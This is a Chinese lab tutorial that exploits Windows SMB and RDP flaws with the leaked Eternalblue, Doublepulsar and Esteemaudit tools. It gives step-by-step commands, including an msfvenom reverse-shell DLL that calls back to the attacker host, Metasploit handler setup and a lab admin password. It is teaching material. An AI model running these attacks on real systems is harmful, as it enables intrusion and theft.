当前位置:文档之家 › 永恒之蓝3389漏洞原理详解解析

永恒之蓝3389漏洞原理详解解析

  • 格式:docx
  • 大小:1.96 MB
  • 文档页数:11

下载文档原格式

  / 11

合集下载

永恒之蓝3389漏洞原理详解

永恒之蓝3389漏洞原理详解

永恒之蓝3389漏洞原理详解实验环境操作机:Windows XPo IP : 172.16.11.2操作机:Kali Linuxo IP : 172.16.12.2目标机:Windows 7 64位o IP : 172.16.12.3目标机:Windows Server 2003o IP : 172.16.12.4掌握工具的用法以及临时防御措施实验步骤实验工具Metasploit:是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程等Equation Group T ools:这是一个集成的工具包,里面包含了IIS6.0、445端口、3 389端口、Rootkit等远程利用工具,本次试验我们主要用到它的445端口远程入侵功能,以及3389远程端口入侵功能。

实验内容Shadow Brokers再次暴露出一份震惊世界的机密文档,其中包含了多个W indows 远程漏洞利用工具,可以覆盖大量的Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用Wi ndows 服务器,这次事件影响力堪称网络大地震。

影响版本全球70% 的Windows 服务器,包括Windows NT、Windows 2000、Windo ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0危害攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。

389爆破服务器全过程 图解 个人翻译英文 非常详细

389爆破服务器全过程 图解 个人翻译英文 非常详细

3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat -an命令可以查看该端口的开启。

对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator,极少会是admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过程。

工具:DUbrute3.0爆破工具(或者用frdpb) SYN扫描工具IP Search 1.首先用IP seacher搜索一段活跃的IP段,也可以在百度搜索活跃3389IP段,其次就是SYN扫描,最好是在server2003的服务器或者虚拟机下扫描,如果硬要在XP系统下扫描,那么先让XP支持SYN扫描,将支持SYN补丁tcpip复制到C:\Windows\System32\Drives目录下,重启后即可进行SYN扫描,对于刚装好的server2003系统先对以下服务进行操。

sc config LmHosts start= auto sc config RpcLocator start= autosc config NtlmSsp start= autosc config lanmanserver start= autosc config SharedAccess start= disablednet start LmHosts 2>nul net start RpcLocator 2>nul net start NtlmSsp 2>nul net start lanmanserver 2>nul net stop SharedAccess >nul 2>nul //*停止防火墙2.将IP seach下的IP段复制到SYN扫描器下的ip.txt中,开始扫描一段时间。

扫描完毕后生产ips文档,IPS文档中的IP就是开启3389端口的IP。

永恒之蓝

永恒之蓝

事件经过
2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子 通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。五个小时内,包括英国、俄 罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解 密恢复文件,对重要数据造成严重损失。
谢谢观看
永恒之蓝
网络攻击工具
01 事件经过
03 事件影响
目录
02 攻击方式 04 病毒防范
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中 包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子 通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型 企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
事件影响
乌克兰、俄罗斯、西班牙、法国、英国等多国均遭遇到袭击,包括政府、银行、电力系统、通讯系统、能源 企业、机场等重要基础设施都被波及,律师事务所DLA Piper的多个美国办事处也受到影响。中国亦有跨境企业 的欧洲分部中招。
病毒防范
微软已于2017年发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补 丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未 开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏 洞修复。
被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半 年后如果还没支付的穷人可以参加免费解锁的活动。原来以为这只是个小范围的恶作剧式的勒索软件,没想到该 勒索软件大面积爆发,许多高校学生中招,愈演愈烈。

永恒之蓝病毒是什么入侵原理

永恒之蓝病毒是什么入侵原理

永恒之蓝病毒是什么入侵原理在去年,全球爆发大规模蠕虫勒索病毒入侵事件,被入侵的用户需支付高额的赎金(或比特币)才能解密文件,目前攻击已造成多处教学系统、医院系统瘫痪。

虽然早已被控制,不过一些网友还是很好奇到底是个什么病毒,能造成全球性计算机安全威胁。

什么是永恒之蓝病毒?据了解,这次事件是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。

这次的“永恒之蓝”勒索蠕虫,是NSA网络军火民用化的全球第一例。

一个月前,第四批NSA相关网络攻击工具及文档被Shadow Brokers组织公布,包含了涉及多个Windows系统服务(SMB、RDP、IIS)的远程命令执行工具,其中就包括“永恒之蓝”攻击程序。

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

目前,“永恒之蓝”传播的勒索病毒以ONION和WNCRY两个家族为主,受害机器的磁盘文件会被篡改为相应的后缀,图片、文档、视频、压缩包等各类资料都无法正常打开,只有支付赎金才能解密恢复。

这两类勒索病毒,勒索金额分别是5个比特币和300美元,折合人民币分别为5万多元和2000多元。

安全专家还发现,ONION勒索病毒还会与挖矿机(运算生成虚拟货币)、远控木马组团传播,形成一个集合挖矿、远控、勒索多种恶意行为的木马病毒“大礼包”,专门选择高性能服务器挖矿牟利,对普通电脑则会加密文件敲诈钱财,最大化地压榨受害机器的经济价值。

没有关闭的445端口“引狼入室”据360企业安全方面5月13日早晨提供的一份公告显示,由于以前国内多次爆发利用445端口传播的蠕虫,部分运营商在主干网络上封禁了445端口,但是教育网及大量企业内网并没有此限制而且并未及时安装补丁,仍然存在大量暴露445端口且存在漏洞的电脑,导致目前蠕虫的泛滥。

基于“永恒之蓝”漏洞的渗透攻击与系统安全加固

基于“永恒之蓝”漏洞的渗透攻击与系统安全加固

61《广播电视网络》 2021年第2期 总第374期1 引言为满足当前广电业务不断融合发展的需要,虚拟化、云平台、大数据系统、IP 化播出前端和制作中心等设备和应用相继投入使用。

与此同时,网络安全面临越来越严重的挑战,大量系统和应用漏洞被发布与利用,其中以“永恒之蓝”漏洞最具代表性。

“永恒之蓝”利用Windows 操作系统SMB 服务漏洞获取系统的最高权限,对应微软公司编号MS17-010。

不法分子通过改造“永恒之蓝”制作了WannaCry 勒索病毒,该病毒利用Windows 操作系统445端口存在的漏洞进行传播,并且具有自我复制、主动传播性。

被WannaCry 勒索病毒入侵后,用户主机、服务器操作系统内的图片、文档、音频、视频、数据等都会被加密,并在桌面弹出勒索对话框,要求受害者支付比特币作为赎金,才能解密并释放被加密的数据。

时至今日,各种新型勒索病毒不断涌现,攻击目标不再限于Windows 操作系统,Linux 操作系统也未能幸免,并且新型勒索病毒对攻击目标的选择越来越精准、隐蔽性越来越强,可以长期潜伏于受害者的内部网络中,当感染的主机和服务器达到一定数量后集中暴发,有的勒索病毒甚至可以预判并删除备份数据,再加密当前运行数据,给企业和用户带来巨大的损失。

基于以上原因,我们非常有必要了解“永恒之蓝”漏洞的攻击方式,从而加固防御系统。

2 信息收集阶段使用NMAP 对局域网靶机进行扫描,发现局域网内靶机开放端口445。

使用Nessus 对靶机进行扫描,扫描结果证明靶机存在MS17-010漏洞。

3 渗透攻击阶段首先,在Kali Linux 中启动Metasploit Framework。

其次,寻找“永恒之蓝”相关可利用模块。

执行命令“msf 6 > search ms17-010”,发现存在扫描模块“auxiliary/scanner/smb/smb_ms17_010”和攻击模块“exploit/基于“永恒之蓝”漏洞的 渗透攻击与系统安全加固姜巍 天津广播电视网络有限公司摘要:在广电网络多业务平台融合发展的大背景下,网络安全面临越来越严重的挑战。

WINDOWS远程桌面管理(3389)爆出严重漏洞

WINDOWS远程桌面管理(3389)爆出严重漏洞

此安全更新可解决远程桌面协议中两个秘密报告的漏洞。

如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。

默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。

没有启用 RDP 的系统不受威胁。

对于 Microsoft Windows 所有受支持的版本,此安全更新的等级为严重。

有关详细信息,请参阅本节中受影响和不受影响的软件小节。

该安全更新通过修改远程桌面协议处理内存中数据包的方式以及 RDP 服务处理数据包的方式来解决漏洞。

有关这些漏洞的详细信息,请参阅下一节漏洞信息下面特定漏洞条目的常见问题 (FAQ)小节。

建议。

大多数客户均启用了自动更新,他们不必采取任何操作,因为此安全更新将自动下载并安装。

尚未启用自动更新的客户必须检查更新,并手动安装此更新。

有关自动更新中特定配置选项的信息,请参阅 Microsoft 知识库文章 294871。

对于管理员、企业安装或者想要手动安装此安全更新的最终用户,Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。

永恒之蓝原理

永恒之蓝原理永恒之蓝(EternalBlue)是一种利用Windows操作系统漏洞的攻击工具,最初由美国国家安全局(NSA)开发,后来被黑客组织“影子经纪人”(Shadow Brokers)泄露并广泛传播。

这一漏洞主要影响了Windows XP、Windows 7和Windows Server 2008等操作系统,使得黑客可以远程执行恶意代码,对系统进行攻击。

永恒之蓝原理的深入了解对于网络安全和漏洞修复具有重要意义。

永恒之蓝利用的是Windows操作系统中的一个SMB服务漏洞,该漏洞允许攻击者在未经授权的情况下执行任意代码。

SMB(Server Message Block)是一种用于在局域网中共享文件、打印机和串口等资源的协议,而永恒之蓝正是利用了SMB协议的漏洞来实施攻击。

通过发送特制的数据包,攻击者可以在目标系统上执行恶意代码,从而获取系统的控制权。

永恒之蓝原理的核心在于对SMB协议的漏洞利用。

攻击者通过构造特定的数据包,利用SMB协议中的漏洞来实现对目标系统的攻击。

这种攻击方式具有隐蔽性强、攻击面广的特点,使得许多未及时更新补丁的系统容易受到攻击。

而且,由于永恒之蓝的泄露和传播,使得该漏洞的威胁程度大大增加,成为网络安全的一大隐患。

针对永恒之蓝原理所带来的安全威胁,相关厂商和安全专家已经采取了一系列的应对措施。

首先是发布了针对该漏洞的安全补丁,用户可以通过及时更新系统补丁来修复漏洞,提高系统的安全性。

其次是加强对SMB协议的安全配置,限制SMB服务的对外访问,减少攻击面。

此外,网络安全厂商也提供了相应的防护软件和设备,帮助用户及时发现和阻止永恒之蓝攻击。

总的来说,永恒之蓝原理是一种利用Windows操作系统漏洞的攻击方式,对系统安全构成了严重威胁。

理解永恒之蓝的原理,采取有效的防护措施,及时修复漏洞,对于提高系统的安全性至关重要。

希望用户和相关安全人员能够加强对永恒之蓝原理的学习和了解,共同维护网络安全,防范潜在的安全风险。

漏洞“永恒之蓝”


永恒之蓝的危害范围
2017年5月14日,WannaCry 勒索病毒出现了变种:WannaCry 2.0,取消Kill Switch 将会 使传播速度或更快。截止2017年5月15日,WannaCry造成至少有150个国家受到网络攻击,
已经影响到金融,能源,医疗等行业,造成严重的危机管理问题。中国部分Window操作系
万大学生受到影响。
WannaCry,一种电脑软件勒索 病毒。该恶意软件会扫描电脑上 的TCP 445端口以类似于蠕虫病 毒的方式传播,攻击主机并加密 主机上存储的文件,然后要求以 比特币的形式支付赎金。
比特币
永恒之蓝的危害范围
2017年5月12日,WannaCry勒索 病毒事件造成99个国家遭受了攻击 ,其中包括英国、美国、中国、俄 罗斯、西班牙和意大利。
处置方案
1
2
3
4
PART 05
事件总结
事前防护
感谢您的观看
主讲人:石海赟
永恒之蓝
主讲人:石海赟
1
勒索病毒的爆发 勒索病毒的事件分析 勒索病毒的本地行为 勒索病毒的应急处置方案 事件总结
2
3
4
5
PART 01
勒索病毒的爆发
爆发
2017年5月12日勒索病毒全球肆虐 ,波及范围达全球99国。英国、意 大利、俄罗斯等全球99个国家爆发 勒索病毒攻击。我国校园网用户的 电脑大面积遭受攻击,预计有2600
PART 03
勒索病毒的本地行为
本地行为
当用户主机系统被该勒索软件入侵后,弹出如下勒索对话框 ,提示勒索目的并向用户索要比特币。加密系统中的照片、图 片、文档、压缩包、音频、视频、可执行程序等几乎所有类型 的文件,被加密的文件后缀名被统一修改为“.WNCRY”。

永恒之蓝原理

永恒之蓝原理随着互联网的普及和信息化的发展,网络安全问题越来越受到人们的关注。

近年来,网络攻击事件层出不穷,造成了极大的损失和影响。

而“永恒之蓝”作为近年来最为恶劣的网络攻击事件之一,更是引起了全球的广泛关注。

“永恒之蓝”是一种利用Windows操作系统漏洞进行攻击的病毒,其攻击方式极具隐蔽性和破坏性。

该病毒的攻击原理主要是利用NSA (美国国家安全局)泄露的Windows系统漏洞,通过网络传播并感染目标计算机,最终实现对目标系统的控制和攻击。

那么究竟是什么原理使得“永恒之蓝”攻击如此成功呢?其实,这与网络安全的基本原理有关。

在网络安全领域,有一个著名的三要素模型,即“机密性、完整性、可用性”模型。

这三个要素分别代表了信息安全的三个方面:保密性、完整性和可用性。

而“永恒之蓝”攻击正是利用了这三个方面的漏洞,实现了对目标系统的攻击和控制。

首先,机密性方面,是指信息在传输和存储过程中不被未授权的人员所知晓。

而“永恒之蓝”攻击正是针对Windows系统的机密性漏洞进行的。

该病毒通过利用Windows系统中的漏洞,实现了对目标系统的入侵和控制,从而窃取了目标系统中的敏感信息。

其次,完整性方面,是指信息在传输和存储过程中不被篡改或损坏。

然而,“永恒之蓝”攻击正是利用了Windows系统的完整性漏洞。

该病毒通过在目标系统中植入恶意代码,实现了对系统的控制和篡改,从而对系统的完整性造成了威胁。

最后,可用性方面,是指信息在传输和存储过程中能够被及时、可靠地获取和使用。

然而,“永恒之蓝”攻击正是利用了Windows系统的可用性漏洞。

该病毒通过在目标系统中植入恶意代码,占用了系统资源,从而造成了系统的崩溃和不可用。

综上所述,“永恒之蓝”攻击利用了Windows系统的机密性、完整性和可用性漏洞,实现了对目标系统的攻击和控制。

而解决这些漏洞,就需要采取有效的措施,提高网络安全的水平。

这包括加强系统漏洞的修补和补丁更新,提高网络安全意识和能力,加强网络安全监管和管理等方面。

《“永恒之蓝”勒索蠕虫最全知识手册 》

《“永恒之蓝”勒索蠕虫最全知识手册》你该知道的都在这里!《“永恒之蓝”勒索蠕虫最全知识手册》2017-05-14 360企业安全今天,你一开机可能就不得不损失300美元!今天,你一开机所有文件将被加密无法读取!What?2017 年5 月12 日,“永恒之蓝”勒索蠕虫爆发,短短几小时,攻击了中国、英国、美国、德国、日本等近百个国家,至少1600 家美国组织,11200 家俄罗斯组织都受到了攻击,截至到5月13日20点,国内也有29372家机构组织的数十万台机器感染,其中有教育科研机构4341家中招,是此次事件的重灾区,事件影响持续发酵中。

什么是“永恒之蓝”勒索蠕虫?中了“永恒之蓝”勒索蠕虫如何紧急处置?。

针对大家最关心的“永恒之蓝”勒索蠕虫的相关问题360企业安全专家进行专业解答,集成《“永恒之蓝”勒索蠕虫最全知识手册》。

关于“永恒之蓝”勒索蠕虫,你该知道的都在这里▌1. 什么是蠕虫病毒?答:蠕虫病毒是一种常见的计算机病毒,它的主要特点是利用电脑存在的漏洞,通过网络进行自主的复制和传播,只要一释放出来,就会在无人干预的情况下以指数级快速扩散。

▌2. 这个病毒到底什么原理?答:这个病毒是勒索软件和蠕虫病毒的合体,利用了Windows操作系统的一个漏洞,投送勒索软件到受害主机。

在有蠕虫的环境中,有漏洞的用户电脑只要开机就会很快被感染,不需要任何用户操作,并且被感染的受害主机还会对其他主机发起同样的攻击,所以传播速度极快。

▌3.中了这个病毒会有什么危害?答:受害主机中招后,病毒就会在受害主机中植入勒索程序,硬盘中存储的文件将会被加密无法读取,勒索蠕虫病毒将要求受害者支付价值300/600美元的比特币才能解锁,而且越往后可能要求的赎金越多,不能按时支付赎金的系统会被销毁数据。

▌4. 这个病毒为什么影响这么严重?答:本次事件被认为是迄今为止影响面最大的勒索交费恶意活动事件,一旦受害主机存在被该病毒利用的漏洞,在连接网络的情况下,即使不做任何操作,病毒就会在受害主机中植入勒索程序,此外,由于其属于蠕虫病毒,具有自我复制、传播的特性,因此扩散速度极快。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验环境
•操作机:Windows XP
o IP : 172.16.11.2
•操作机:Kali Linux
o IP : 172.16.12.2
•目标机:Windows 7 64位
o IP : 172.16.12.3
•目标机:Windows Server 2003
o IP : 172.16.12.4
•掌握工具的用法以及临时防御措施
实验步骤
实验工具
•Metasploit:是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程等
•Equation Group Tools:这是一个集成的工具包,里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具,本次试验我们主要用到它的445端口远程入侵功能,以及3389远程端口入侵功能。

实验内容
Shadow Brokers再次暴露出一份震惊世界的机密文档,其中包含了多个W indows 远程漏洞利用工具,可以覆盖大量的Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用W indows 服务器,这次事件影响力堪称网络大地震。

影响版本
全球70% 的Windows 服务器,包括Windows NT、Windows 2000、Windo
ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 200 8、Windows 2008 R2、Windows Server 2012 SP0
危害
攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权
限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。

一旦攻击成功,攻击者能直接控制目标主机,甚至直接下载数据库,盗取商业机密,很多的政府、事业单位都会受到影响,影响极大,危害不言而喻。

步骤1:利用Eternalblue与Doublepulsar插件,验证445 SMB漏洞我们本步骤利用Eternalblue和Doublepulsar这两个"插件"来获取Windows 7 64位的系统权限。

其中Eternalblue可以利用SMB漏洞,获取Windows 7 系统权限
而Doublepulsar可以加载Metasploit生成的恶意DLL。

我们首先进入cmd命令行,在命令行中进入文件夹:
cd C:\EQGRP_Lost_in_Translation-master/Windows
输入命令:
fb.py //运行python文件
注:在一般情况下需要在工具根目录下创建listeningposts文件夹,否则运行文件时,会报错。

接下来依次填入对应信息:
172.16.12.3//目标IP
172.16.11.2//本地IP
no //取消重定向
c:\logs //指定日志文件目录
继续填入相关新信息:
0//创建一个新项目
Test_Win7 //项目名称
Yes //确认路径
到这里就完成了最基本的信息配置,正式启动了脚本,接下来继续进行配置,这时就要用到第一个插件了,使用命令:
use Eternalblue //使用Eternalblue
注意这里要选择操作系统、系统位数、传输方式,我们分别选择Windows 7、64位、FB传输方式,其他配置信息直接按回车键,保持默认即可。

当看到Eternalblue Succeeded字样,代表成功。

接下来需要用到Metasploit,使用Everything搜索并使用XShell连接到Kali Linu x:
连接成功后,使用如下命令生成恶意DLL:
msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2LPORT= 12399-f dll >win.dll
这时,/home目录下就会生成win.dll文件,然后使用如下命令进入Metasp loit,设置TCP监听端口,用于接受攻击成功后返回的Shell:
msfconsole
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 172.16.12.2//设置本地IP
set LPORT 12399//设置本地端口
run //运行
如图,Metasploit已经成功运行,等待Shell的返回。

现在将之前生成的win.dll文件通过FTP复制到Windows机器上:
首先点击下图中使用红色小框标示的图
标:
本文中,我将dll文件放在C盘根目录:
接下来使用Doublepulsar来加载生成的dll文件。

注:这里系统位数、后门操作、后门路径,我们分别选择64位、RunDL L、c:\win.dll,其他保持默认即可
配置完之后,提示成功。

我们再来查看Metasploit
可以看到,成功的利用了插件,已经获取了Shell。

然后退回操作机cmd命令行下,重新运行fb.py.准备进行下一步骤.
步骤2:利用Esteemaudit插件,验证3389 RDP漏洞
本步骤利用Esteemaudit插件,来验证漏洞存在。

(本步骤的目标地址为17
2.16.12.4)
与上一步骤一样,首先设置基本信息,这里就不在赘述:
基本信息配置完成之后,下面对ESTEEMAUDIT 插件进行配置:
use ESTEEMAUDIT //使用ESTEEMAUDIT插件
这里我将CallbackPort设置为8899端口(其他端口也可
以)
手动加载rudo_x86.dll和capa_x86.dll,因为插件默认选项都在D盘,它不能识别安装目录,我们复制之前位置,位于C:\EQGRP_Lost_in_Translation-master\windo ws\storage,如
图:
手动加载lipa_x86.dll,原因同
上:
其他保持默认即可。

可以看到,成功执行。

(同学们也可以使用3389端口对Windows Server 2003进行登录,目标IP为172.16.12.4,账号密码为[administrator,ichunqiu123. ],使用命令netstat -ant 查看是否成功连接)
实验结果分析与总结
本次实验我们成功的使用工具Eternalblue、Doublepulsar、ESTEEMAUDIT对SMB、RDP协议漏洞进行了演示攻击。

临时修复方案
•使用防火墙过滤/关闭137、139、445端口。

•对于3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。

•升级补丁,更新系统。

思考
本文中对445和3389端口进行了验证,请在课下尝试对其他的协议、Payl oad以及其他系统进行尝试。